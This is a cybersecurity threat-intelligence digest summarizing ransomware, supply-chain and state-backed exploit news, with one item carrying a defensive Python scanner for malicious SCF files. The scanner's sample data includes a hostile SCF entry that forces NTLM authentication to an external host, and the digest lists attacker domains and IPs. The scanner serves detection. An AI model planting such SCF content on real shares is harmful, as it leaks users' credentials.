Sunday, May 04, 2025 // (IG): BB // GITHUB // SN R&D
Cyberattacks Surge on Food and Agriculture Sector as Industry Warns of Underfunded Defenses
Bottom Line Up Front (BLUF): Ransomware attacks on the food and agriculture sector have doubled in 2025, exposing critical vulnerabilities in one of the United States’ most essential industries. Lawmakers and cybersecurity experts warn that outdated infrastructure, limited visibility, and insufficient federal oversight leave farms, processors, and food distributors dangerously exposed to cyber threats. Despite recent incidents, the U.S. Department of Agriculture (USDA) has been criticized for lacking direction and resources to address the mounting risks.
Analyst Comments: Cybercriminal groups like Clop, RansomHub, and Akira are intensifying their focus on food supply chain targets due to their reliance on legacy technology, limited IT staffing, and the sector's time-sensitive operations. The rise of precision agriculture and GPS-linked systems, while improving efficiency, has widened the attack surface. Without dedicated funding and a coordinated federal cybersecurity strategy, disruptions to cold storage, processing plants, or logistics platforms could lead to immediate national supply shortages. The bipartisan push in Congress for a sector-specific risk assessment and simulation exercise is a critical first step. Still, broader regulatory reform and cyber resilience investments are urgently needed to safeguard the nation’s food security.
FROM THE MEDIA: Rep. Brad Finstad (R-MN) warned at a Hack the Capitol panel in May 2024 that agricultural systems are increasingly digital and exposed to sophisticated cyber threats. Despite this, the USDA allocates less than $1 million toward cybersecurity, according to experts like Mark Montgomery of the Foundation for Defense of Democracies. Meanwhile, data collected by Food and Ag-ISAC shows ransomware attacks more than doubled in early 2025, with 84 incidents in Q1 alone. Notable incidents include million-dollar disruptions to poultry producers in South Africa and a Siberian dairy processor. CyberScoop also reports that ransomware now accounts for over half of all known threats targeting the food sector, with many victims opting not to report attacks due to reputational and operational fears.
READ THE STORY: CS // The Record
China and North Korea Scale Zero-Day Exploit Ecosystems to Strategic Threat Level
Bottom Line Up Front (BLUF): China and North Korea have established industrial-scale, state-backed systems for developing, stockpiling, and deploying zero-day exploits. These structured ecosystems leverage academia, military units, and private entities to support strategic cyber operations, economic disruption, and long-term infiltration of global critical infrastructure. The sophistication and scale of these programs pose a growing challenge to conventional cybersecurity models.
Analyst Comments: By fusing state resources with academic and private-sector talent, these regimes have built exploit pipelines that rival traditional tech-sector R&D in scale and sophistication. China’s use of AI-driven tools and public “bug bounty” fronts like Tianfu Cup serves the dual purposes of talent acquisition and covert capability development. North Korea’s operations, while leaner, are tactically aggressive and financially motivated. The warehousing of exploits for maximum strategic leverage adds unpredictability to an already volatile cyber threat landscape. This suggests a need for proactive global vulnerability intelligence sharing and stricter oversight of supply chain dependencies.
FROM THE MEDIA: At the RSA Conference 2025, Google Cloud’s Threat Intelligence team reported that for the first time, North Korea matched China in zero-day exploit volume. Chief analyst John Hultquist highlighted that these exploits are discovered and weaponized via organized, state-directed programs integrating military, academic, and private-sector resources. China and North Korea increasingly automate discovery and delivery through advanced fuzzing, continuous testing platforms, and malware-as-a-service frameworks. Their targets include aerospace firms, financial systems, and Western software supply chains, with the aim of securing persistent access, causing disruption, and extracting economic value.
READ THE STORY: Gov InfoSec
RansomHub Deploys SocGholish for WebDAV and SCF-Based Credential Heists
Bottom Line Up Front (BLUF): RansomHub ransomware operators leverage the SocGholish malware loader to infiltrate networks using fake browser updates and vulnerable CMS platforms. Recent campaigns exploit WebDAV and SCF file tricks to harvest NTLM credentials, enabling stealthy lateral movement and paving the way for ransomware deployment.
Analyst Comments: Abusing legacy Windows features such as WebDAV and SCF files shows attackers pivoting toward system-level exploitation rather than relying solely on user interaction. These techniques sidestep typical endpoint defenses, emphasizing the need for organizations to disable outdated Windows protocols, enforce network segmentation, and implement monitoring for NTLM hash leaks. Blending SocGholish with RansomHub infrastructure reveals a maturing ecosystem in which loader malware serves as a persistent foothold for ransomware affiliates.
FROM THE MEDIA: Darktrace researchers have tracked a string of SocGholish infections since January 2025, tied to compromised WordPress sites distributing JavaScript-based fake browser updates. Affected users were redirected to Keitaro TDS domains, where they unknowingly downloaded ZIP archives containing the loader. Post-compromise activity included exploitation of WebDAV to initiate NTLM hash leaks via forced authentication to external IPs and the use of ‘Thumbs.scf’ files on internal SMB shares to stealthily harvest credentials. The malware also deployed Python-based backdoors for persistent access and used encrypted C2 communications, employing non-standard ports to evade detection. These infections ultimately funneled access to RansomHub ransomware infrastructure, which uses techniques like port-hopping and HTTPS-based C2 to obfuscate traffic. Indicators of Compromise (IoCs) include domains such as packedbrick[.]com and IP addresses like 185.174.101[.]240 linked to RansomHub’s command infrastructure.
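A defender-side check for the SCF trick described above, added here as an example rather than code from Darktrace or the original report: it sweeps SCF files found on a file share, parses each file's IconFile entry, and flags any entry that points at a UNC host, because Explorer authenticates to that host just to render the folder listing. External hosts are rated high severity and internal ones are queued for review; a file named Thumbs.scf is called out as a disguise. The share paths, file contents, the internal address ranges and the .corp.example DNS suffix are all constructed for this example.

```python
import ipaddress
import re

# Internal address space for this illustration (assumption: replace with your own ranges).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
INTERNAL_DNS_SUFFIX = ".corp.example"   # hypothetical internal DNS suffix

# Constructed sample files as they might be collected when sweeping an SMB share.
# Paths and contents are invented for this example; none come from the reported campaign.
SAMPLE_SHARE = {
    r"\\fileserver01\public\Thumbs.scf": (
        "[Shell]\r\nCommand=2\r\nIconFile=\\\\198.51.100.23\\share\\i.ico\r\n"
        "[Taskbar]\r\nCommand=ToggleDesktop\r\n"),
    r"\\fileserver01\public\Show Desktop.scf": (          # the legitimate Windows shortcut
        "[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n"
        "[Taskbar]\r\nCommand=ToggleDesktop\r\n"),
    r"\\fileserver01\hr\desktop.scf": (
        "[Shell]\r\nCommand=2\r\nIconFile=\\\\10.20.30.40\\icons\\corp.ico\r\n"),
}

# Captures the host portion of a UNC path such as \\host\share\file.ico
UNC_HOST = re.compile(r"^\\\\([^\\]+)\\")


def parse_scf(text):
    """Minimal INI-style parse of an SCF file: {section: {key: value}}, keys lowercased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections


def is_internal_host(host):
    """True for RFC 1918/loopback addresses or names under the internal DNS suffix."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "." not in host or host.lower().endswith(INTERNAL_DNS_SUFFIX)
    return any(ip in net for net in INTERNAL_NETS)


def assess_scf(path, text):
    """Return (severity, [reasons]) for one SCF file."""
    reasons, severity = [], "none"
    icon = parse_scf(text).get("shell", {}).get("iconfile", "")
    match = UNC_HOST.match(icon)
    if match:
        host = match.group(1)
        # Any UNC IconFile makes Explorer authenticate to that host when the folder is opened.
        if is_internal_host(host):
            severity = "medium"
            reasons.append(f"IconFile forces SMB authentication to internal host {host}; confirm it is a sanctioned server")
        else:
            severity = "high"
            reasons.append(f"IconFile forces SMB authentication to external host {host}: NTLM hash leak")
    name = path.rsplit("\\", 1)[-1].lower()
    if name == "thumbs.scf":
        # Mimics the Thumbs.db cache file so it is overlooked; decisive only together with a UNC IconFile.
        severity = "high" if match else "low"
        reasons.append("file name imitates the Thumbs.db cache to blend in")
    return severity, reasons


def sweep_share(files):
    """Assess every SCF file in a {path: contents} mapping."""
    return {path: assess_scf(path, text) for path, text in files.items()}


if __name__ == "__main__":
    for path, (severity, reasons) in sweep_share(SAMPLE_SHARE).items():
        print(f"{severity:6} {path}")
        for reason in reasons:
            print(f"        - {reason}")
```

The scanner reads file contents you have already collected, so it can run from a scheduled job over a share listing; pair its hits with firewall logs showing outbound SMB or WebDAV connections from workstations to confirm whether credentials actually left the network.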
READ THE STORY: GBhackers
Malicious Go Modules Unleash Disk-Wiping Linux Malware in Advanced Supply Chain Attack
Bottom Line Up Front (BLUF): Researchers have uncovered three malicious Go modules that deliver disk-wiping malware targeting Linux systems through obfuscated code and remote payload execution. The malware completely erases the primary disk (/dev/sda), rendering systems unbootable and irrecoverable, highlighting the growing severity of software supply chain threats.
Analyst Comments: Unlike traditional data theft or ransomware, this disk-wiping tactic aims to maximize operational disruption, particularly within Linux server and developer environments. Using trusted code repositories like GitHub to distribute these modules raises critical concerns for software integrity. Organizations must implement tighter dependency vetting, continuous monitoring, and behavior-based anomaly detection to mitigate such threats. This also points to the urgent need for stronger package management policies and digital signing of software components to enhance authenticity verification.
FROM THE MEDIA: Three Go packages (prototransform, go-mcp, and tlsproxy) hosted on GitHub contained obfuscated logic to download and execute a shell script that overwrites Linux primary disks. Upon detecting a Linux environment, the malicious modules fetch the payload using wget, triggering irreversible data destruction via the dd command. This aligns with a broader trend of supply chain abuse: additional findings from Socket, Fortinet, and Sonatype include npm and PyPI packages stealing mnemonic seed phrases and using Gmail SMTP servers and WebSockets for data exfiltration and command execution. Notable malicious npm packages include crypto-encrypt-ts and userrelationship-paypal, while compromised PyPI packages like coffin-codes-2022 have collectively amassed tens of thousands of downloads. These developments reveal how attackers exploit open-source ecosystems' trust and ubiquity for both sabotage and espionage.
READ THE STORY: THN
Cybersecurity Community Pushes Back as Trump Administration Guts CISA, Fires Leadership
Bottom Line Up Front (BLUF): Some in the cybersecurity community publicly protest the Trump administration’s sweeping personnel cuts and strategic shifts within federal cyber agencies, especially the Cybersecurity and Infrastructure Security Agency (CISA). These changes, including the firing of top cyber officials and a proposed $500 million budget cut to CISA, have sparked fears of weakened national resilience amid escalating threats from Russia and China.
Analyst Comments: The removal of leadership figures like Gen. Timothy Haugh (NSA, CYBERCOM) and Chris Krebs, paired with dramatic defunding efforts, signals a sharp pivot in the federal cyber policy playbook. While the administration insists reforms are aimed at streamlining operations, industry insiders interpret the moves as politically motivated retaliation. The timing—amid increasing cyber aggression from adversaries—could embolden state-aligned attackers and degrade U.S. deterrence. The backlash from cyber professionals, including over 400 signatories to public letters of protest, indicates a rare breach in the traditionally apolitical infosec community, highlighting the severity of perceived risk. These fractures could deepen unless coherent policy and leadership stability are restored quickly.
FROM THE MEDIA: Former CISA Director Jen Easterly resigned on Inauguration Day, and prominent figures like Chris Krebs have faced investigations and loss of security privileges. A rising chorus from RSA Conference attendees, former officials, and industry leaders warns that these shifts threaten the country’s ability to counter increasing cyber threats. Homeland Security Secretary Kristi Noem and National Security Council cyber lead Alexei Bulazel attempted to calm concerns during the conference. Still, vague assurances failed to convince many in the field, who fear the administration is prioritizing politics over protection.
READ THE STORY: Politico
U.S. Indicts Yemeni Hacker Behind Black Kingdom Ransomware Attacks on 1,500 Systems
Bottom Line Up Front (BLUF): The U.S. Department of Justice has charged Rami Khaled Ahmed, a Yemeni national, for developing and deploying the Black Kingdom ransomware between March 2021 and June 2023. The campaign compromised approximately 1,500 systems across sectors, including healthcare, education, and hospitality in the U.S., exploiting Microsoft Exchange vulnerabilities.
FROM THE MEDIA: Black Kingdom, although technically crude, leveraged widely known vulnerabilities and social engineering to cause significant disruption, demonstrating that sophistication is not always required for effectiveness. This case highlights the long tail of ransomware campaigns that began during the ProxyLogon wave in early 2021 and signals continued concern about persistent actors operating in less-policed jurisdictions. As ransomware ecosystems fragment, prosecution efforts are crucial in disrupting even the lower-tier actors fueling the ransomware-as-a-service model.
READ THE STORY: The Record
Rhysida Ransomware Gang Claims Hack of Peruvian Government’s Digital Platform
Bottom Line Up Front (BLUF): The Rhysida ransomware group has claimed responsibility for a cyberattack against Gob.pe, the official digital services platform of the Peruvian government, demanding a ransom of 5 BTC (~$488,000 USD). While Peruvian authorities deny a cyberattack and attribute service disruptions to maintenance, threat intelligence firms and leaked data samples suggest otherwise. The attack is the latest in a growing list of government-targeted operations by the Russian-linked gang.
Analyst Comments: Rhysida's alleged breach of Peru’s centralized digital infrastructure underscores the group’s ongoing focus on public-sector targets, exploiting high-value platforms to extort ransom payments and reputational leverage. The group’s ability to conduct double extortion attacks—exfiltrating sensitive documents before encryption—mirrors a broader ransomware evolution. Notably, Rhysida continues to target countries and institutions with limited cyber maturity or under geopolitical strain, suggesting opportunistic targeting within broader regional disruption campaigns. If confirmed, this would be a critical wake-up call for Latin American states to invest in more resilient cybersecurity architectures, particularly for centralized digital platforms housing citizen data.
FROM THE MEDIA: The gang shared sample documents and issued a seven-day deadline for payment. Peruvian officials denied any breach, attributing website outages to “scheduled maintenance,” although independent analysis suggests partial confirmation of Rhysida’s claims. This attack follows a pattern of municipal and government-targeted operations by the group, which has previously impacted Montreal-Nord, the City of Columbus, and Seattle-Tacoma International Airport. The FBI and CISA warned about Rhysida’s tactics in a 2023 joint advisory under the #StopRansomware initiative.
READ THE STORY: Security Affairs
Items of interest
Genetic Data at Risk: 23andMe Bankruptcy Sparks National Security Fears Over Chinese Acquisition
Bottom Line Up Front (BLUF): The bankruptcy of genetic testing firm 23andMe has triggered national security concerns about the potential sale of its vast genomic database to foreign adversaries, particularly the Chinese government. With more than 15 million individuals' DNA profiles at stake, experts warn that gaps in U.S. bankruptcy and foreign investment law could allow the Chinese Communist Party to exploit the situation and acquire this sensitive biometric data.
Analyst Comments: China’s strategic focus on biotechnology as a geopolitical and military power domain makes U.S. genomic data a high-value target. Despite 23andMe’s public statement that it will not sell to “countries of concern,” U.S. law lacks sufficient safeguards to prevent indirect or covert acquisition during bankruptcy. Chinese entities, including those affiliated with the People’s Liberation Army, have previously used bankruptcy courts to bypass national security reviews, as in the 2017 Atop Tech case. Genetic information isn’t just personal—it has strategic value for surveillance, military enhancement, and even targeted bioweapon research. U.S. policymakers must modernize foreign investment and data security laws to prevent adversarial access to genomic databases.
FROM THE MEDIA: According to an op-ed in The Hill by Craig Singleton of the Foundation for Defense of Democracies, 23andMe’s Chapter 11 filing could open the door for foreign buyers, including Chinese firms aligned with Beijing’s military-civil fusion doctrine, to bid on its genetic database. The data includes intimate health and ancestral information on millions of users. Singleton notes China’s 2020 Biosecurity Law compels Chinese firms to share biological data with the state, and PLA strategists view genetic data as crucial to developing next-generation military capabilities. Though 23andMe has stated it will not sell to adversarial nations, experts argue that U.S. oversight mechanisms are too weak to guarantee that promise will be upheld during bankruptcy proceedings.
READ THE STORY: The Hill
Your genetic data was hacked, now it's for sale: The dark fall of 23andMe (Video)
FROM THE MEDIA: 23andMe is going bankrupt, and your genetic data—your biological instruction manual—could be sold to the highest bidder.
23andMe BANKRUPTCY: What Happens to Your DNA Data & Privacy? (Video)
FROM THE MEDIA: 23andMe, the popular genetic testing company, has filed for Chapter 11 bankruptcy. This video explains why they faced financial troubles, including challenges beyond just ancestry analysis and the impact of a major data breach.
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.